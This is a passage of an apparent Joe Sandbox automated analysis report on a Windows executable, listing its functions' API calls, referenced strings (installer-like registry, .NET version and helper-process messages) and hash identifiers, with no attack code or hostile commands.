                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                    • API String ID: 1452528299-3112430753
                                                                                    • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                    • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                                    • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                    • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32 ref: 0045C2FA
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                                    • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                                    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                                      • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                    • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                    • API String ID: 59345061-4263478283
                                                                                    • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                    • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                                    • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                    • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                                    APIs
                                                                                    • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                    • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                    • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                    • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                    • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                    • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                    • 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                    • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                    • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                                    • String ID:
                                                                                    • API String ID: 3135053572-0
                                                                                    • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                    • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                    • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                    • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                    APIs
                                                                                      • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                                    • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                    • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                    • API String ID: 971782779-3668018701
                                                                                    • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                    • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                                    • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                    • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                                      • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                    • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                                    • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                                    Strings
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                                    • RegOpenKeyEx, xrefs: 00453E2C
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                                    • , xrefs: 00453E1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue$FormatMessageOpen
                                                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                    • API String ID: 2812809588-1577016196
                                                                                    • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                    • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                                    • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                    • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                                    APIs
                                                                                      • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                                    Strings
                                                                                    • .NET Framework version %s not found, xrefs: 00458D29
                                                                                    • v2.0.50727, xrefs: 00458C7B
                                                                                    • .NET Framework not found, xrefs: 00458D3D
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                                    • v1.1.4322, xrefs: 00458CE2
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                                    • v4.0.30319, xrefs: 00458C11
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$Open
                                                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                    • API String ID: 2976201327-446240816
                                                                                    • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                    • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                                    • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                    • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                                    • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                                    Strings
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                                    • Helper isn't responding; killing it., xrefs: 004581A7
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                                    • Helper process exited., xrefs: 004581E5
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
                                                                                    • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                    • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                                    • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                    • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                                      • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                    Strings
                                                                                    • RegCreateKeyEx, xrefs: 00453ADF
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                                    • , xrefs: 00453ACD
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFormatMessageQueryValue
                                                                                    • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                    • API String ID: 2481121983-1280779767
                                                                                    • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                    • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                                    • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                    • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                                    APIs
                                                                                      • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                      • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                                    • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                                    • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                                      • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                    • 73A15CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                    • API String ID: 170458502-2312673372
                                                                                    • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                    • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                                    • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                    • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                                    • API String ID: 4190037839-37397897
                                                                                    • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                    • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                                    • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                    • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 00462124
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                    • API String ID: 2610873146-3407710046
                                                                                    • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                    • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                                    • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                    • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 0042F008
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                    • API String ID: 2610873146-3407710046
